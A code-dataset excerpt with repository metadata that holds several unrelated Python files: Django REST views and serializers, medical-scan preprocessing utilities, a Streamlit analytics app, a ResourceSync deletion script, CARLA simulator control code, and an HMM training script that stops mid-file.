repo_name stringlengths 7-111 | __id__ int64 16.6k-19,705B | blob_id stringlengths 40-40 | directory_id stringlengths 40-40 | path stringlengths 5-151 | content_id stringlengths 40-40 | detected_licenses list | license_type stringclasses 2 values | repo_url stringlengths 26-130 | snapshot_id stringlengths 40-40 | revision_id stringlengths 40-40 | branch_name stringlengths 4-42 | visit_date timestamp[ns] | revision_date timestamp[ns] | committer_date timestamp[ns] | github_id int64 14.6k-687M ⌀ | star_events_count int64 0-209k | fork_events_count int64 0-110k | gha_license_id stringclasses 12 values | gha_fork bool 2 classes | gha_event_created_at timestamp[ns] | gha_created_at timestamp[ns] | gha_updated_at timestamp[ns] | gha_pushed_at timestamp[ns] | gha_size int64 0-10.2M ⌀ | gha_stargazers_count int32 0-178k ⌀ | gha_forks_count int32 0-88.9k ⌀ | gha_open_issues_count int32 0-2.72k ⌀ | gha_language stringlengths 1-16 ⌀ | gha_archived bool 1 class | gha_disabled bool 1 class | content stringlengths 10-2.95M | src_encoding stringclasses 5 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 10-2.95M | extension stringclasses 19 values | num_repo_files int64 1-202k | filename stringlengths 4-112 | num_lang_files int64 1-202k | alphanum_fraction float64 0.26-0.89 | alpha_fraction float64 0.2-0.89 | hex_fraction float64 0-0.09 | num_lines int32 1-93.6k | avg_line_length float64 4.57-103 | max_line_length int64 7-931 |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
conleydg/kanban-django | 6,201,932,810,431 | ae73a922817dc4e3684e3ae3b1712b5456f621c3 | 8c1a4b848a4262da55b9ae7290bbd4f76acfca99 | /tasks/views.py | 160e0ab4bdcc710fccbeb0d89c050fe2feee152f | []
| no_license | https://github.com/conleydg/kanban-django | f96ac69c343723e0730d303ab08e959304d4a0cc | 40cf1f27ae7df894fa0652c232be52b2c37669f4 | refs/heads/master | 2016-09-12T09:32:35.842397 | 2016-05-17T00:17:27 | 2016-05-17T00:17:27 | 58,590,809 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.contrib.auth.models import User, Group
from rest_framework import viewsets, permissions
from .models import Task
from .serializers import TaskSerializer, UserSerializer, GroupSerializer
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import Permission, User
from django.shortcuts import render
def index(request):
return render(request, 'tasks/index.html')
class TaskViewSet(viewsets.ModelViewSet):
# queryset = Task.objects.all().order_by('priority')
serializer_class = TaskSerializer
def get_queryset(self):
user = self.request.user
qs = Task.objects.filter(auth_u_id=user.id)
return qs.order_by('priority')
# return Task.objects.all().order_by('priority')
# return self.request.user.task.all()
# user = self.request.user
# return Task.objects.filter(auth_u_id=user.auth_u_id)
# permission_classes = (permissions.IsAuthenticated)
def perform_create(self, serializer):
serializer.save(auth_u=self.request.user)
# def users_task(self):
# queryset = Task.object.all()
# # return
class UserViewSet(viewsets.ModelViewSet):
queryset = User.objects.all().order_by('-date_joined')
serializer_class = UserSerializer
class GroupViewSet(viewsets.ModelViewSet):
queryset = Group.objects.all()
serializer_class = GroupSerializer
| UTF-8 | Python | false | false | 1,409 | py | 7 | views.py | 6 | 0.713272 | 0.713272 | 0 | 45 | 30.311111 | 72 |
DanielRJohansen/DumbLesion | 14,834,817,073,761 | ae25db9e1bf3d5a470c70c209e84494757eec43c | 26d6af68056ef62dbf8e543d5b073f51d0ef2050 | /Toolbox.py | 26e63514e4685fecb33b6847c7548cadd5809316 | []
| no_license | https://github.com/DanielRJohansen/DumbLesion | c7992249aba1c6e26767bf7530564584e72c7e51 | 2cb2007e215f593ad216d1d36055328ede8eabec | refs/heads/master | 2022-11-24T23:29:55.279664 | 2020-07-26T13:09:58 | 2020-07-26T13:09:58 | 272,507,533 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from glob import glob
import os
import torch
import cv2
import numpy as np
import csv
import Constants
def get_subs(folder):
return glob(folder + r"\*")
def min_images(folder):
fewest = 9999
bins = [0]*1000
for sf in get_subs(folder):
num_images = len(get_subs(sf))
bins[num_images] += 1
if num_images < fewest:
fewest = num_images
print(sf, fewest)
print("Fewest images in all folders:", fewest)
print(bins)
def delete_files(folder, f_format=".csv", suffix_len=4):
print("Removing {} files from {}".format(f_format, folder))
for sf in get_subs(folder):
for file in get_subs(sf):
if file[-suffix_len:] == f_format:
os.remove(file)
def save_tensor(tensor, file_name):
torch.save(tensor, file_name + ".pt")
def highest_lowest(path):
im = torch.load(path)
print(path)
print("Lowest: ", torch.min(im))
print("Highest ", torch.max(im))
def getFolderAndCenter(string):
i = len(string)-1
while True:
if string[i] == '_':
break
i -= 1
folder = string[:i]
center = string[i+1:]
return folder, center
def makeSectionList(folder, center):
ims = get_subs(folder)
i = 0
while i < len(ims):
if ims[i] == center:
break
i += 1
section = ims[i-3:i+4]
return section
from matplotlib import pyplot as plt
def loadSection(section_paths, im_size):
section = []
for path in section_paths:
im = cv2.imread(path, cv2.CV_16U)
im = cv2.resize(im, (im_size, im_size), interpolation=cv2.INTER_CUBIC)
section.append(np.asarray(im))
section = torch.tensor(section, dtype=torch.float32)
section = section.type(torch.float32)
section = torch.sub(section, 32768)
im = section.numpy()
hist, bins = np.histogram(im.ravel(), 400, [-1000, 3000]) # Use hist
return section, hist
def saveSectionAndHist(section, hist, folder, name):
name = name[:-4]
name = os.path.join(folder, name)
if not os.path.isdir(folder):
os.makedirs(folder)
hist = torch.tensor(hist, dtype=torch.float32)
torch.save(section, name + "_section.pt")
torch.save(hist, name + "_hist.pt")
def makeAOC(src, dst, data_file, im_size):
with open(data_file) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
count = 0
for row in csv_reader:
if count == 0:
count += 1
continue
sf, center = getFolderAndCenter(row[0])
print(sf)
sf_path = os.path.join(src, sf)
center_path = os.path.join(src, sf, center)
dst_path = os.path.join(dst, sf)
section = makeSectionList(sf_path, center_path)
if len(section) != 7:
continue
section, hist = loadSection(section, im_size=im_size)
saveSectionAndHist(section, hist, dst_path, center)
import ast
def toList(string):
list = ast.literal_eval(string)
return list
def drawBB(im_path, AOC_label):
pass
def getRelativeBoxPosition(row, num_areas):
box = toList(row[6])
size = toList(row[13])[0]
box = np.multiply(box, num_areas/size)
box = np.round(box)
return box
def makeAOCLabel(box, num_areas):
label = np.zeros((num_areas, num_areas), dtype=np.float32)
for y in range(num_areas):
for x in range(num_areas):
if y >= box[1] and y <= box[3] and x >= box[0] and x <= box[2]:
label[y][x] = 1
return torch.tensor(label)
def makeAOCLabels(dst, data_file, num_areas):
with open(data_file) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
count = 0
for row in csv_reader:
if count == 0:
count += 1
continue
sf, center = getFolderAndCenter(row[0])
print(sf)
if elementExists(dst, sf, center[:-4]):
box = getRelativeBoxPosition(row, num_areas)
label = makeAOCLabel(box, num_areas)
name = os.path.join(dst, sf, center[:-4])
torch.save(label, name + "_AOCLabel.pt")
def cleanElement(string):
index = 0
while index < len(string):
if string[index] == '_':
break
index += 1
return string[:index]
def elementExists(f, sf, name):
if not os.path.isdir(os.path.join(f, sf)):
return False
elemsinfolder = os.listdir(os.path.join(f, sf))
elemsinfolder = list(set(list(map(cleanElement, elemsinfolder)))) # Stackoverflow, obviously..
for e in elemsinfolder:
if name == e:
return True
return False
def makeZLabels(dst, data_file):
with open(data_file) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
count = 0
for row in csv_reader:
if count == 0:
count += 1
continue
sf, center = getFolderAndCenter(row[0])
print(sf)
name = center[:-4]
path = os.path.join(dst, sf, name)
if elementExists(dst, sf, name):
z = torch.tensor(toList(row[8])[2], dtype=torch.float32)
torch.save(z, path + "_zlabel.pt")
def visualizeLabel(im_path, label_path):
label = torch.load(label_path)
im = cv2.imread(im_path, cv2.CV_16U)
print(im.shape)
label = torch.add(label, 1)
label = torch.div(label, 2).numpy()
#label = label.astype(np.uint16)
label = cv2.resize(label, (512, 512))
im = cv2.normalize(im, None, alpha=0, beta=1, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_32F)
im = cv2.multiply(im, label)
cv2.imshow("result", im)
cv2.waitKey()
def visualizePrediction(inputs, predictions):
for i in range(Constants.section_depth):
print(predictions[i])
input = inputs[i][0][3].numpy()
prediction = predictions[i]
input = cv2.resize(input, (512, 512))
input = cv2.normalize(input, None, alpha=0, beta=1, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_32F)
prediction = torch.add(prediction, 1.)
prediction = torch.div(prediction, 3.).cpu().detach().numpy()
prediction = cv2.resize(prediction, (512, 512))
im = cv2.multiply(input, prediction)
cv2.imshow("Prediction", im)
cv2.waitKey()
def printJpegs(): #No need, all is png :)
for sf in get_subs(r"D:\DumbLesion\NIH_scans\Images_png"):
for im in get_subs(sf):
if im[-3:] != "png":
print(im) | UTF-8 | Python | false | false | 6,626 | py | 14 | Toolbox.py | 13 | 0.57712 | 0.556746 | 0 | 228 | 28.065789 | 104 |
BIGKINGS10/demos | 3,659,312,141,879 | 5f357a8c0700d350c7afc723fa8e52c66258ce93 | 725c9ea87a1561daa00c104cdc056fc92cdaba18 | /DataAnalyticsRobot.py | 60bc29513192926c7efdee018cc76ee74671dcc7 | []
| no_license | https://github.com/BIGKINGS10/demos | 4f888d2b386a28d3968585a0e992257e3b82e49f | cadaa51cfc7ae2789fa9707843c82817d0883a1c | refs/heads/main | 2023-04-08T21:46:03.198388 | 2021-04-02T17:28:38 | 2021-04-02T17:28:38 | 343,210,180 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import streamlit as st
#import plotly_express as px
import pandas as pd
import numpy as np
#title of the app
st.title("Data Analytics Robot")
#Add a sidebar
st.sidebar.subheader("Visualization Settings")
#setup file upload
uploaded_file = st.sidebar.file_uploader(label="Upload your CSV or Excel File.", type=['csv','xlsx'])
global df
if uploaded_file is not None:
print(uploaded_file)
print("hello")
try:
df = pd.read_csv(uploaded_file)
except Exception as e:
print(e)
df = pd.read_excel(uploaded_file)
try:
st.write(df)
col= list(df.columns.values)
#col= list(df.select_dtypes.('number').columns)
option = st.sidebar.selectbox("Choose a field",(col))
#st.header(option)
#st.write(df.isnull().sum())
st.write(df[col].corr())
if st.sidebar.checkbox('Show dataframe'):
st.write("This is for testing the checkbox")
except Exception as e:
print(e)
st.write("Please upload file to the application.")
| UTF-8 | Python | false | false | 947 | py | 1 | DataAnalyticsRobot.py | 1 | 0.703273 | 0.703273 | 0 | 45 | 20 | 101 |
dhenry314/gleanomatic | 16,286,515,999,371 | 2453a71d7b6256da31f11cab0ca199f1200478ef | 3fb61cb2da8cad71b214a7faadffc27bcd1a5315 | /gleanomatic/scripts/deleteByNamespace.py | cb4e4edfabe204bb7ab67933c48726b32d43db76 | []
| no_license | https://github.com/dhenry314/gleanomatic | 4ed0ed80836e4aa622392ec804e6ca2a95336a7b | 9c9c8ab9a6da83d4a1fc429289c7450bf606005b | refs/heads/master | 2021-07-06T02:55:43.571032 | 2019-04-15T18:21:12 | 2019-04-15T18:21:12 | 148,791,398 | 0 | 1 | null | false | 2018-10-04T21:35:10 | 2018-09-14T13:19:57 | 2018-10-04T19:40:00 | 2018-10-04T21:35:10 | 40 | 0 | 1 | 0 | Python | false | null | import sys
import json
from datetime import datetime
from gleanomatic import Utils
import gleanomatic.gleanomaticLogger as gl
from gleanomatic.RSRestClient import RSRestClient
if len(sys.argv) < 2:
print("USAGE: deleteByNamespace.py {sourceNamespace}/{setNamespace}\n")
exit()
localhost = "http://localhost:81/"
argParts = sys.argv[1].split("/")
sourceNamespace = argParts[0]
setNamespace = argParts[1]
now = datetime.now()
batchTag = str(now.year)+str(now.month).zfill(2)+str(now.day).zfill(2)+ "_deletion"
logger = gl.gleanomaticLogger(sourceNamespace,setNamespace,batchTag)
rc = RSRestClient('http://resourcesync',logger)
ResURL = 'http://resourcesync/RS/' + str(sourceNamespace) + "/" + str(setNamespace) + "/resourcelistindex.json"
ResListContents = Utils.getContent(ResURL)
resList = json.loads(ResListContents)
for res in resList['sitemapindex']['sitemap']:
if 'rs:ln' in res:
if '@type' in res['rs:ln']:
if str(res['rs:ln']['@type']).lower() == 'application/json':
subResListURL = res['rs:ln']['@href']
subResListURL = subResListURL.replace(localhost,'http://resourcesync/')
#DEBUG
print(subResListURL)
subResContents = Utils.getContent(subResListURL)
subResList = json.loads(subResContents)
for url in subResList['urlset']['url']:
if 'rs:ln' in url:
if '/resource/' in url['rs:ln']['href']:
resPath = url['rs:ln']['href']
uri = 'http://resourcesync' + str(resPath)
rc.deleteResource(uri)
print("deleted: " + str(uri))
| UTF-8 | Python | false | false | 1,744 | py | 46 | deleteByNamespace.py | 38 | 0.603211 | 0.598624 | 0 | 46 | 36.913043 | 111 |
zwc662/CARLA | 11,381,663,353,526 | e6b4acaee539ede53d6f19d4f04586718b3071f0 | 3178c199a3a6f5805fc45c8791204259bcb39125 | /PythonAPI/synchronous_mode/synchronous_mode_client_control.py | ae9abb39fe68210649993c9cbc145dd7b6b9a213 | []
| no_license | https://github.com/zwc662/CARLA | e3550d6fa2b07036c69d10a9f1642cc975ce5e2e | ec32181c67417c56d93d3d7afd22946c50e78a6c | refs/heads/master | 2021-07-21T14:12:52.241222 | 2020-08-21T01:20:37 | 2020-08-21T01:20:37 | 207,066,345 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# Copyright (c) 2019 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
import glob
import os
import sys
import pickle
try:
sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
import carla
import random
try:
import pygame
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
try:
import numpy as np
except ImportError:
raise RuntimeError('cannot import numpy, make sure numpy package is installed')
try:
import queue
except ImportError:
import Queue as queue
#sys.path.insert(0,'/home/ruihan/UnrealEngine_4.22/carla/Dist/CARLA_0.9.5-428-g0ce908db/LinuxNoEditor/PythonAPI/carla')
# print(sys.path)
from model_predicative_control_new import MPCController
from agents.navigation.my_basic_agent import BasicAgent
from ilqr.ilqr import ILQRController
from synchronous_mode_client_control_test_NN import spawn_trolley
class CarlaSyncMode(object):
"""
Context manager to synchronize output from different sensors. Synchronous
mode is enabled as long as we are inside this context
with CarlaSyncMode(world, sensors) as sync_mode:
while True:
data = sync_mode.tick(timeout=1.0)
"""
def __init__(self, world, *sensors, **kwargs):
self.world = world
self.sensors = sensors
self.frame = None
self.delta_seconds = 1.0 / kwargs.get('fps', 20)
self._queues = []
self._settings = None
def __enter__(self):
self._settings = self.world.get_settings()
self.frame = self.world.apply_settings(carla.WorldSettings(
no_rendering_mode=False,
synchronous_mode=True,
fixed_delta_seconds=self.delta_seconds))
def make_queue(register_event):
q = queue.Queue()
register_event(q.put)
self._queues.append(q)
make_queue(self.world.on_tick)
for sensor in self.sensors:
make_queue(sensor.listen)
return self
def tick(self, timeout, vehicle=None, control=None):
self.frame = self.world.tick()
data = [self._retrieve_data(q, timeout, vehicle, control) for q in self._queues]
assert all(x.frame == self.frame for x in data)
return data
def __exit__(self, *args, **kwargs):
self.world.apply_settings(self._settings)
def _retrieve_data(self, sensor_queue, timeout, vehicle=None, control=None):
# counter = 0
while True:
data = sensor_queue.get(timeout=timeout)
# if vehicle is not None:
# print(counter, "control", control.throttle, control.steer)
# vehicle.apply_control(control)
# counter += 1
if data.frame == self.frame:
return data
def draw_image(surface, image, blend=False):
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
image_surface = pygame.surfarray.make_surface(array.swapaxes(0, 1))
if blend:
image_surface.set_alpha(100)
surface.blit(image_surface, (0, 0))
def get_font():
fonts = [x for x in pygame.font.get_fonts()]
default_font = 'ubuntumono'
font = default_font if default_font in fonts else fonts[0]
font = pygame.font.match_font(font)
return pygame.font.Font(font, 14)
def should_quit():
for event in pygame.event.get():
if event.type == pygame.QUIT:
return True
elif event.type == pygame.KEYUP:
if event.key == pygame.K_ESCAPE:
return True
return False
# =================================
# RH: customized methods
# ===============================
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
def get_mpc_control(world, vehicle, m, controller, actor_list, blueprint_library):
# TODO: add more params in the dict,
# which can be automatically converted (to replace args)
params_dict = {'target_speed': 10}
params = AttrDict(params_dict)
# get current "measurements"
t = vehicle.get_transform()
v = vehicle.get_velocity()
c = vehicle.get_control()
measurements_dict = {"v": v,
"t": t} # TODO: create a dict that return the world&vehicle data similar as 0.8 API
measurements = AttrDict(measurements_dict)
cur_wp = m.get_waypoint(t.location)
local_interval = 0.5
horizon = 30
# initiate a series of waypoints
future_wps = []
future_wps.append(cur_wp)
for i in range(horizon):
# TODO: check whether "next" works here
future_wps.append(random.choice(future_wps[-1].next(local_interval)))
# # save data for testing
# print("future_wps")
# print(future_wps)
# print("measurements")
# print(measurements)
# data = []
# for waypoint in future_wps:
# data.append({"waypoint": transform_to_arr(waypoint.transform)})
# actor_list.append(spawn_trolley(world, blueprint_library, x=waypoint.transform.location.x, y=waypoint.transform.location.y))
# print("transform")
# data.append({"measurements.t": transform_to_arr(measurements.t)})
# print(transform_to_arr(measurements.t))
# print("velocity")
# data.append({"measurements.v": np.array([measurements.v.x, measurements.v.y, measurements.v.z])})
# print(np.array([measurements.v.x, measurements.v.y, measurements.v.z]))
# print("full data")
# print(data)
# for MPCController
# one_log_dict = controller.control(future_wps, measurements)
# for ILQRController
# Build target waypoints array
future_wps_np = []
for waypoint in list(future_wps)[:controller.steps_ahead]:
future_wps_np.append(transform_to_arr(waypoint.transform)[0:2])
future_wps_np = np.array(future_wps_np)
xs, us = controller.control(future_wps_np, measurements)
# print("one_log_dict in run_carla_client")x
# print(one_log_dict)
control = carla.VehicleControl()
# control.throttle, control.steer = one_log_dict['throttle'], one_log_dict['steer']
control.throttle, control.steer = us[0][0], us[0][1]
return control
def reach_destiny(destiny_loc, vehicle):
veh_loc = vehicle.get_transform().location
dist_vec = np.array([destiny_loc.x-veh_loc.x, destiny_loc.y-veh_loc.y])
print("dist", dist_vec, np.linalg.norm(dist_vec))
return np.linalg.norm(dist_vec)
def transform_to_arr(tf):
return np.array([tf.location.x, tf.location.y, tf.location.z, tf.rotation.pitch, tf.rotation.yaw, tf.rotation.roll])
# ===============================
# main function
# ===============================
def main():
pygame.init()
actor_list = []
display = pygame.display.set_mode(
(800, 600),
pygame.HWSURFACE | pygame.DOUBLEBUF)
font = get_font()
clock = pygame.time.Clock()
client = carla.Client('localhost', 2000)
client.set_timeout(2.0)
world = client.get_world()
# actor_list = world.get_actors() # can get actors like traffic lights, stop signs, and spectator
# set a clear weather
# weather = carla.WeatherParameters(cloudyness=0.0, precipitation=0.0, sun_altitude_angle=90.0)
# world.set_weather(weather)
world.set_weather(carla.WeatherParameters.ClearNoon)
try:
m = world.get_map()
spawn_points = m.get_spawn_points()
print("total number of spawn_points", len(spawn_points))
destiny = carla.Location(x=-2.419357, y=204.005676, z=1.843104)
start_pose = carla.Transform(location=carla.Location(x=-6.446170, y=-79.055023))
wps_file = "wps_at_plant_rotary_01.pt"
load_wps = pickle.load(open(wps_file, 'rb'))
print(load_wps)
recovered_wps = []
for wp in load_wps:
recovered_wps.append(m.get_waypoint(carla.Location(x=wp[0], y=wp[1])))
print("recovered_wps")
print(recovered_wps)
start_pose = recovered_wps[0].transform
print("start_pose", start_pose)
# start_pose = random.choice(spawn_points)
print("car start_pose", start_pose.location)
waypoint = m.get_waypoint(start_pose.location)
blueprint_library = world.get_blueprint_library()
# set a constant vehicle
vehicle_bp = random.choice(blueprint_library.filter('vehicle.lincoln.mkz2017'))
vehicle = world.spawn_actor(vehicle_bp, start_pose)
actor_list.append(vehicle)
vehicle.set_simulate_physics(True)
camera_rgb = world.spawn_actor(
blueprint_library.find('sensor.camera.rgb'),
carla.Transform(carla.Location(x=-5.5, z=2.8), carla.Rotation(pitch=-15)),
attach_to=vehicle)
actor_list.append(camera_rgb)
camera_semseg = world.spawn_actor(
blueprint_library.find('sensor.camera.semantic_segmentation'),
carla.Transform(carla.Location(x=-5.5, z=2.8), carla.Rotation(pitch=-15)),
attach_to=vehicle)
actor_list.append(camera_semseg)
vehicle_agent = BasicAgent(vehicle, target_speed=30)
destiny = spawn_points[94]
destiny_loc = destiny.location
vehicle_agent.set_destination((destiny_loc.x, destiny_loc.y, destiny_loc.z))
target_speed = 10
# controller = MPCController(target_speed)
controller = ILQRController(target_speed, steps_ahead=25)
# try to spawn a static actor at destination
# for attr in blueprint:
# if attr.is_modifiable:
# blueprint.set_attribute(attr.id, random.choice(attr.recommended_values))
# trolley_bp = random.choice(blueprint_library.filter('static.prop.shoppingtrolley')) # vehicle.toyota.prius static.prop.shoppingtrolley
# trolley_tf = carla.Transform(location=carla.Location(x=destiny_loc.x, y=destiny_loc.y, z=5))
# print("trolley_bp", trolley_bp, trolley_tf.location)
# trolley = world.spawn_actor(trolley_bp, trolley_tf)
# actor_list.append(trolley)
# trolley.set_simulate_physics(False)
# pt_loc = carla.Location(x=destiny_loc.x, y=destiny_loc.y, z=0.5)
# print("debug", world.debug)
# world.debug.draw_string(pt_loc, 'O')
# world.debug.draw_point(pt_loc, 100)
# vehicle.set_autopilot(True)
# TODO: store this as pts_2D DF
# distance = 1
# waypoints = m.generate_waypoints(distance)
# print("waypoints length", len(waypoints))
# for wp in waypoints:
# print("waypoint", wp.transform.location)
# world.debug.draw_string(wp.transform.location, 'X', draw_shadow=False,
# color=carla.Color(r=255, g=0, b=0), life_time=120.0,
# persistent_lines=True)
# Create a synchronous mode context.
with CarlaSyncMode(world, camera_rgb, camera_semseg, fps=30) as sync_mode:
while True:
if should_quit():
return
if reach_destiny(destiny_loc, vehicle)<0:
return
clock.tick(30)
# Choose the next waypoint and update the car location.
waypoint = random.choice(waypoint.next(1.5))
# vehicle.set_transform(waypoint.transform)
# TODO: instead of set_transform, pass the waypoint info to controller and use the controller output to drive the vehicle
# TODO: the semseg is useful for later perception module
# BasicAgent use PD control
# control = vehicle_agent.run_step(debug=True)
control = get_mpc_control(world, vehicle, m, controller, actor_list, blueprint_library) # put controlller outside syncmode
# control = carla.VehicleControl(throttle=1, steer=0)
print("control", control.throttle, control.steer)
vehicle.apply_control(control)
# Advance the simulation and wait for the data.
snapshot, image_rgb, image_semseg = sync_mode.tick(timeout=2.0, vehicle=vehicle, control=control)
image_semseg.convert(carla.ColorConverter.CityScapesPalette)
fps = round(1.0 / snapshot.timestamp.delta_seconds)
# Draw the display.
draw_image(display, image_rgb)
draw_image(display, image_semseg, blend=True)
display.blit(
font.render('% 5d FPS (real)' % clock.get_fps(), True, (255, 255, 255)),
(8, 10))
display.blit(
font.render('% 5d FPS (simulated)' % fps, True, (255, 255, 255)),
(8, 28))
pygame.display.flip()
# raise ValueError("stop here")
print('destroying local actors.')
for actor in actor_list:
actor.destroy()
finally:
print('destroying actors.')
for actor in actor_list:
actor.destroy()
pygame.quit()
print('done.')
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('\nCancelled by user. Bye!')
| UTF-8 | Python | false | false | 13,751 | py | 331 | synchronous_mode_client_control.py | 22 | 0.610428 | 0.595593 | 0 | 385 | 34.716883 | 144 |
edublancas/pipeline | 1,666,447,328,613 | 6ba66db85ba97ce3ae4d0bfb9983e2d86d6af46c | 98a936d5372294ed892a9bf9cf98646c72af515c | /pipeline/lab/FrozenJSON.py | 4982ba1a31619c7f158f6658a42fa7939e4ac706 | [
"MIT"
]
| permissive | https://github.com/edublancas/pipeline | f6d22ad07b134be98c139d1de6ca7d8321072ba8 | 5bef04d77fdadc1dc4ec22b9b346f0a062cca1ce | refs/heads/master | 2021-05-15T01:09:50.072378 | 2016-12-29T05:45:48 | 2016-12-29T05:45:48 | 59,692,708 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from collections import Mapping, MutableSequence
import keyword
class FrozenJSON(object):
"""A read-only facade for navigating a JSON-like object
using attribute notation.
Based on FrozenJSON from 'Fluent Python'
"""
def __new__(cls, arg):
if isinstance(arg, Mapping):
return super(FrozenJSON, cls).__new__(cls)
elif isinstance(arg, MutableSequence):
return [cls(item) for item in arg]
else:
return arg
def __init__(self, mapping):
self._data = {}
for key, value in mapping.items():
if keyword.iskeyword(key):
key += '_'
self._data[key] = value
def __getattr__(self, name):
if hasattr(self._data, name):
return getattr(self._data, name)
else:
return FrozenJSON(self._data[name])
def __dir__(self):
return self._data.keys()
def __getitem__(self, key):
return self._data[key]
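# Minimal usage sketch (added for illustration; not part of the original module).
# The sample data and assertions are assumptions chosen to show the attribute-style
# navigation, keyword mangling, and element-wise list wrapping described above.
if __name__ == '__main__':
    fj = FrozenJSON({'name': 'demo', 'class': 'A', 'tags': [{'id': 1}]})
    assert fj.name == 'demo'          # plain values come back unwrapped
    assert fj.class_ == 'A'           # reserved keyword 'class' is stored as 'class_'
    assert fj.tags[0].id == 1         # lists are wrapped element by element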
| UTF-8 | Python | false | false | 994 | py | 27 | FrozenJSON.py | 24 | 0.561368 | 0.561368 | 0 | 35 | 27.4 | 59 |
lexuanthien/python-django-basic | 8,306,466,766,573 | 91bdd117fc2f71cea5dff51d7ebdc8c2677b5b26 | 94cc1a151b1a6e72522407a3241647182ce1528f | /issue/serializers.py | 26ec48976b27f88ec64eb8efa6ba47d90182269f | []
| no_license | https://github.com/lexuanthien/python-django-basic | 5a155d722cd206f4bd09024ff0dea607bfff1462 | b56d4b72b8c1529679751e93b48eb846ff8e48a4 | refs/heads/master | 2023-06-11T06:10:40.946499 | 2021-06-28T08:39:06 | 2021-06-28T08:39:06 | 380,962,866 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from rest_framework import serializers
from .models import Task
class TaskSerializer(serializers.ModelSerializer):
title = serializers.CharField()
content = serializers.CharField(max_length=10)
type = serializers.IntegerField(default=1)
class Meta:
model = Task
fields = ['title', 'content', 'type', 'created_at', 'updated_at']
# class TaskSerializer(serializers.Serializer):
# title = serializers.CharField()
# content = serializers.CharField(max_length=10)
# type = serializers.IntegerField(default=1) | UTF-8 | Python | false | false | 551 | py | 17 | serializers.py | 9 | 0.713249 | 0.702359 | 0 | 17 | 31.470588 | 73 |
j-towns/ssm-code | 3,040,836,885,446 | 0fc3fb560e605fa069f23d10294c30767fb5b30a | d0772e49724cb282e8435784053cbdd6cf05ae67 | /generate_model_plot.py | c439166b2b9101e29aeecf376e884e25f247a1fb | [
"MIT"
]
| permissive | https://github.com/j-towns/ssm-code | 6bd4ad1a89483b029a6b8dd53eb1bfc816b317ef | 4255ac0f7801779e3511a8d9c64b9ee846c26e21 | refs/heads/master | 2023-03-27T10:15:37.360335 | 2021-03-19T11:13:30 | 2021-03-19T11:13:30 | 349,015,928 | 9 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Based on examples/hmm_em.py, from the Autograd repository.
from __future__ import division, print_function
from dataclasses import replace
import autograd.numpy as np
import autograd.numpy.random as npr
from autograd.scipy.special import logsumexp
from autograd import value_and_grad as vgrad
from functools import partial
from os.path import join, dirname
import string
import craystack as cs
import hmm_codec
def EM(init_params, data, callback=None):
def EM_update(params):
natural_params = list(map(np.log, params))
# E step:
loglike, E_stats = vgrad(log_partition_function)(natural_params, data)
if callback: callback(loglike, params)
return list(map(normalize, E_stats)) # M step
def fixed_point(f, x0, max_iter=50):
x1 = f(x0)
# while different(x0, x1):
# x0, x1 = x1, f(x1)
for _ in range(max_iter):
x0, x1 = x1, f(x1)
return x1
# def different(params1, params2):
# allclose = partial(np.allclose, atol=5e-2, rtol=5e-2)
# return not all(map(allclose, params1, params2))
return fixed_point(EM_update, init_params)
def normalize(a):
def replace_zeros(a):
return np.where(a > 0., a, 1.)
return a / replace_zeros(a.sum(-1, keepdims=True))
def log_partition_function(natural_params, data):
if isinstance(data, list):
return sum(map(partial(log_partition_function, natural_params), data))
log_pi, log_A, log_B = natural_params
log_alpha = log_pi
for y in data:
log_alpha = logsumexp(log_alpha[:,None] + log_A, axis=0) + log_B[:,y]
return logsumexp(log_alpha)
def initialize_hmm_parameters(num_states, num_outputs):
init_pi = normalize(npr.rand(num_states))
init_A = normalize(npr.rand(num_states, num_states))
init_B = normalize(npr.rand(num_states, num_outputs))
return init_pi, init_A, init_B
def build_dataset(filename, max_lines=-1):
"""Loads a text file, and turns each line into an encoded sequence."""
encodings = dict(list(map(reversed, enumerate(string.printable))))
digitize = lambda char: (encodings[char]
if char in encodings else len(encodings))
encode_line = lambda line: np.array(list(map(digitize, line)))
nonblank_line = lambda line: len(line) > 2
with open(filename) as f:
lines = f.readlines()
encoded_lines = list(map(
encode_line, list(filter(nonblank_line, lines))[:max_lines]))
num_outputs = len(encodings) + 1
return encoded_lines, num_outputs
if __name__ == '__main__':
np.random.seed(0)
np.seterr(divide='ignore')
train_size, test_size, compress_size = 100, 20, 100
# callback to print log likelihoods during training
print_loglike = lambda loglike, params: print(
loglike / train_size,
log_partition_function(list(map(np.log, params)), test_inputs)
/ test_size)
# load training data
lstm_filename = join(dirname(__file__), 'war_and_peace.txt')
inputs, num_outputs = build_dataset(
lstm_filename, max_lines=train_size + test_size + compress_size)
train_inputs, test_inputs, compress_inputs = (
inputs[:train_size],
inputs[train_size:train_size + test_size],
inputs[train_size + test_size:]
)
# train with EM
